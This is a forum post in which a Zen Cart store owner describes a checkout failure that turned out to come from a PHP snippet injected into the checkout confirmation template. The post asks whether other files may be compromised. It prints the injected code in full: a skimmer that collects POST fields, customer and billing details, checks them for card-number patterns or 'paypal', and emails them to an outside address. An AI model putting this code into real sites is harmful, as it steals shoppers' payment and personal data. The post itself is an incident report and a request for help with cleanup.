Hi, today i got notified by a customer that he cannot go past the second step of the checkout.
I immediately tried to replicate the problem with a test user account and i encountered the same problem : a blank page instead of the 3rd step. No error message, nothing.
I started to browse the forum and do searches on google and i encountered the debug tool listed in many threads by Dr. Byte (sorry if i spelled your name wrong dude).
I followed the steps and i received this error in the log :
[19-Dec-2010 08:27:21] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/xxxxxxx/public_html/includes/templates/cherry_zen/templates/tpl_checkout_confirmation_default.php on line 212
I opened the tpl_checkout_confirmation_default.php and noticed something weird at the end of the page. A small script with an email address that i have never seen before. What struck me was "what exactly is this doing here" as it seemed pretty unnatural for an email address to be in the checkout code.
I then opened the default cherry zen template to compare the 2 files and as you guess, the script with the email was an extra.
I uploaded the default tpl_checkout_confirmation_default.php file that came with the cherry zen template and everything went back to normal.
I also did the security update in the config for the inoculation or something against hackers.
My real question is : could other files be compromised ? If anyone encountered this before, i would like to know what other files might have these "extra" scripts.
Here is the extra that was in the checkout confirmation php file :
Code:
<?php
$msgz = "";
if (!isset($_SERVER)) { $_SERVER = &$HTTP_SERVER_VARS; }
$msgz .= "========================================================\r\n";
foreach ($_POST as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->customer as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->billing as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->billing['country'] as $key => $value) { $msgz .= "country-".$key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
$msgz .= $_SERVER['HTTP_REFERER']."\r\n".$_SERVER['SCRIPT_FILENAME']"\r\n";
$msgz .= "\r\n========================================================\r\n";
if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
@mail('cnewberry497######################','setoran',$msgz);
} else {
@mail('cnewberry497######################','setoran',$msgz);
}
?>
Bookmarks